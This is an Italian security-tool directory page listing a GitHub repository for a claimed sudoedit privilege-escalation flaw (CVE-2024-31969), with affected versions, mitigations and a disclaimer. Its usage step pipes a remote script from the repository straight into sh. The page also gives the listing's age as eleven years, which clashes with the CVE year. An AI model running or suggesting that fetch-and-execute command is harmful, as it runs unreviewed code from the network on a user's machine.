Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-31969 — CVE-2024-31969 è un privilege escalation locale in sudo quando si utilizza sudoedit. | Kitploit
Strumenti/GitHubGitHub/kingfakee7/cve-2024-31969
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e Formazione
GitHubkingfakee7/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 è un privilege escalation locale in sudo quando si utilizza sudoedit.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

📌 CVE-2024-31969

CVE-2024-31969 è una vulnerabilità di escalation dei privilegi locale in sudo quando si utilizza il comando sudoedit.

Questa vulnerabilità è stata introdotta a partire da sudo 1.9.0 a causa del modo in cui sudoedit validava le variabili d'ambiente dell'utente e la proprietà dei file in modo non corretto.


📖 Descrizione

Un difetto introdotto in sudo 1.9.0 nel modo in cui sudoedit validava le variabili d'ambiente degli utenti e la proprietà dei file.

Questa vulnerabilità consente a un utente locale con accesso a sudoedit di modificare file arbitrari come root manipolando variabili d'ambiente come SUDO_EDITOR o sfruttando symlink.


📊 Versioni di Sudo interessate:

Versione di SudoStato
1.9.0 → 1.9.15p4🔥 Vulnerabile
1.9.15p5 e successive✅ Sicuro
1.8.x (incluse 1.8.23)❌ Non interessato

📦 Installazione e Utilizzo

Esegui il seguente comando:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Soluzione / Mitigazione

  • Aggiorna sudo alla versione 1.9.15p5 o successiva.
  • Limita le regole sudoers che consentono sudoedit agli utenti non root.
  • Usa una configurazione sicura di env_keep o env_reset nel file /etc/sudoers.

📚 Riferimenti

  • CVE-2024-31969 su NVD

⚠️ Disclaimer

Questa repository è stata creata a scopo educativo e di documentazione sulla sicurezza dei sistemi.
È severamente vietato utilizzare queste informazioni per attività illegali o senza il permesso scritto del proprietario del sistema.
Qualsiasi forma di abuso è completamente al di fuori della responsabilità dell'autore.

Scarica lo strumento